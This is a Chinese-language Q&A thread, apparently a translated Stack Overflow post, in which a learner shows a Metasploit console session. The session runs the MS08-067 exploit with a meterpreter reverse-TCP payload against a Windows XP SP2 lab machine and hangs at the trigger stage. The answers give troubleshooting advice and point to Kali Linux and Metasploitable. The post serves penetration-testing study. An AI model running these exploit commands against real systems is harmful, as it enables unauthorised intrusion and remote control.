我正在学习Metasploit框架,从Armitage开始,以便对结构有一个大致的了解。我试图破解一个旧的Windowx XP sp2,当我尝试运行漏洞时,我得到了这个
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.18.130
LHOST => 192.168.18.130
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 13592
LPORT => 13592
msf exploit(ms08_067_netapi) > set RHOST 10.0.0.11
RHOST => 10.0.0.11
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.18.130:13592
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
我没有得到任何错误,但它停在那里并且没有执行漏洞利用。
答案 0 :(得分:1)
因此,看起来该漏洞利用不适用于您拥有的Windows版本。也许你可以尝试另一种,更简单的东西。这些漏洞是什么时候创建的?您是否完全确定它们在您的Windows版本中未修补?
如果您想学习运行其他人编写的漏洞利用脚本的任何内容,您必须开始调试并尝试了解脚本正在做什么。在它写出Attempting to trigger the vulnerability
之后找出脚本正在做什么,并试图找出它可能无法正常工作的原因。这里推测的可能性太多了。
答案 1 :(得分:0)
ms08_067_netapi是针对未修补的Windows XP系统的可靠攻击。但是,远程攻击可能会出现许多问题。尝试重新启动目标系统并确保基于主机的防火墙已关闭。如果它仍然不起作用,那么你的XP系统可能会被修补。 耸肩
我注意到这篇SO帖子的标题是指BackTrack Linux。 BackTrack Linux不再支持Armitage。 Metasploit框架在2013年4月经历了一次重大的依赖性转变,打破了BackTrack Linux环境。考虑转移到Kali Linux。这是BackTrack Linux的继承者。
Google for Kali Linux [我没有“声望”点给你两个以上的链接]
http://sourceforge.net/projects/metasploitable/files/Metasploitable2/